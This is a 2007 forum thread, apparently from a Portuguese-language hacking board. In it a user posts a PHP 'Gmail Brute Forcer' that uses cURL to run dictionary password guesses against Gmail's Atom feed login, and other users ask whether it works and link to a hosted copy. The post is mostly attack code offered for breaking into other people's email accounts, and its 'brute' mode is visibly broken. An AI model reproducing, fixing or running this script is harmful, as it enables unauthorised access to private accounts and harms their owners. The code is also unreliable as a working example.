Title: Gmail Brute Forcer (PHP)
Post by: DarkGenesis on 04 de June , 2007, 11:41:53 PM
Post by: DarkGenesis on 04 de June , 2007, 11:41:53 PM
Gmail Brute Forcer (PHP)
Code Select
<?php
//////////////////////
////Gmail-Brute//////
//Thehackers.info///
///Mad-Hatter///////
//////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
</table>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionary attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute force attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
?>
Title: Re: Gmail Brute Forcer (PHP)
Post by: Anonymous on 05 de June , 2007, 12:00:08 AM
Post by: Anonymous on 05 de June , 2007, 12:00:08 AM
Muito bom mesmo a ideia, agora e testar quem quiser aqui segue o link do Gmail.php.
Clique aqui. (//http://killerbat.5gbfree.com/upload/w2box/gmail.php)
Clique aqui. (//http://killerbat.5gbfree.com/upload/w2box/gmail.php)
Title: Re: Gmail Brute Forcer (PHP)
Post by: bironet on 05 de June , 2007, 12:16:55 AM
Post by: bironet on 05 de June , 2007, 12:16:55 AM
Não entendi como funciona isso ainda... Ta pronto ou tem que editar? Bruterforce ainda existe?
Title: Re: Gmail Brute Forcer (PHP)
Post by: Mago on 17 de June , 2007, 03:56:06 AM
Post by: Mago on 17 de June , 2007, 03:56:06 AM
esse ae funciona mesmo alguem jah testou ?! 
Title: Re: Gmail Brute Forcer (PHP)
Post by: Gothic_Souls on 24 de July , 2007, 08:24:08 PM
Post by: Gothic_Souls on 24 de July , 2007, 08:24:08 PM
Ainda não testei, mais dei uma olhada
e pelo que entendi parece ser um código malicioso em php, que depois de compilado e hospedado é só abrir a pagina, e dar a permissão que ele irá começar testar milhares de senhas para tentar uma bruta força em quebrar senhas de mails.
Acho que é isso.
e pelo que entendi parece ser um código malicioso em php, que depois de compilado e hospedado é só abrir a pagina, e dar a permissão que ele irá começar testar milhares de senhas para tentar uma bruta força em quebrar senhas de mails.
Acho que é isso.
Title: Re: Gmail Brute Forcer (PHP)
Post by: Anonymous on 25 de July , 2007, 09:57:16 PM
Post by: Anonymous on 25 de July , 2007, 09:57:16 PM
E aí pessoal, beleza?
Alguém já conseguiu quebrar uma senha de email no mundo real com um brute-force web?
Localmente, já costuma ser uma tarefa bastante demorada... via http então..
Abraços a todos.
Alguém já conseguiu quebrar uma senha de email no mundo real com um brute-force web?
Localmente, já costuma ser uma tarefa bastante demorada... via http então..
Abraços a todos.